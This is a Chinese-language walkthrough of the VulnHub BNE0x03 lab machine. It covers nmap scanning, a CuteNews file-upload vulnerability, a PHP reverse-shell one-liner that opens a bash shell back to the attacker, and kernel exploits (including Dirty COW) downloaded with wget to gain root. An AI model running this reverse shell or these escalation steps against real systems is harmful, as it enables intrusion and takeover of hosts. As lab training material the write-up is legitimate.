vulnhub,BNE0x03靶机

准备工作

进入vulnhub.com下载BNE0x03靶机，然后直接用vmware打开

攻击过程

nmap信息收集

打开kali，用nmap -sn 扫描C段查看存活主机

发现多了一个，这个就是靶机的地址，用nmap --min-rate 1000 -p- 以1000的速率扫描开放的端口

发现80端口开放，http服务，用nmap -sT（用TCP协议） -sV（探测服务版本号） -sC（默认脚本） -O（探测操作系统版本端口） -p80 扫描目标端口

发现在这上面跑的是阿帕奇2.4.7的服务，系统是ubuntu，有CuteNews，内容管理系统。主机的内核大概率是linux3.x，小概率4.x，范围在3.2-4.9之间。
用脚本扫描

需要一些时间，打开浏览器看看这个主机的服务长啥样

web渗透

出现了登陆页面，可能的攻击方式有注入、目录爆破、根据版本号查看有没有可以方便利用的漏洞。用kali使用searchsploit查找有没有收录的版本漏洞

发现有个任意文件上传的漏洞，我们把他给的这个说明文件下载下来瞅瞅

Cute漏洞利用

我们猫一下这个文件

发现它告诉我们怎么利用这个漏洞，按照这个步骤走一下试试。这时候前边脚本扫描结果出来了

它发现了一个DOS攻击，在渗透测试中一般不能使用破坏性攻击方式，所以没啥用。
在web端注册进去之后是这么个样子

写一个反弹shell脚本上传

反弹shell脚本

  <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/localip/port 0>&1'");?>    

写了个php的反弹shell脚本，直接上传然后成功了

按理说要进行目录爆破找找看这个脚本上传到哪了，然后发现这个利用信息中已经说明了位置


下来开始监听端口

然后点击执行脚本，获取shell

查看用户和确认主机ip


进入家目录查看有哪些用户以及用户目录下有啥文件

发现啥都没有
查看一下系统版本

机器的名字叫simple，内核是ubuntu，linux版本3.16-30，Ubuntu是40-14.04.1，用sudu -l查看一下初级用户有没有啥特权

接下来猫一下/etc/cron文件查看有没有自动任务

提权失败

啥都没有，我们来尝试一下内核提权，按照前边查看的版本号搜索一下版本漏洞

发现这俩是比较贴近我们的版本的，尝试一下

下载下来之后在80端口架设一个web服务器

到我们获取的sell这连接我们的kali用wget获取我们刚刚下好的这个脚本文件
在这个过程中要记得我们是个初级用户，得回到有写权限的目录下才能成功获取文件。
接下来要编译我们的这个脚本，先在本地看一下有什么特别要求没

没有特别要求，那我们直接编译就好。gcc 37292.c -o 37292 然后执行

发现不成功，我们换个方法，用linpeas自动扫描，给出提权建议，首先我们需要下载linpeas
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
然后启动http服务，再去到shell中把linpeas.sh给下下来，然后执行。
（命令被脚本的报告顶上去了，假装这里有图。。。。）

现在出现了它给的建议，那我们就采用它的建议试试，用脏牛来提权，我们把他的利用文件下载下来

然后去到靶机的shell中把这个文件从kali中下载

然后猫一下这个文件，看看编译有没有特殊要求

要加上pthread，我们来编译一下然后运行

又失败了。。。。

成功提权

试了几个，然后找到了这个可以成功

过程跟前边失败的差不多，先去searchspolit把这个文件下下来，然后在靶机上wget下载下来，然后猫一下看看编译有没有啥特殊的，最后执行就行，成功拿到root权限

看看有没有flag之类的东东

最终获取了flag，大功告成

总结

在前边获取反弹shell的过程还是比较顺利和轻松，他的提示文件是很正常的测试步骤，即使没有也应该要能够想到这样的步骤来进行测试。后边的提权过程就稍微麻烦一点，主要是一下子找不到合适的利用文件进行提权，还是需要多练习积累经验。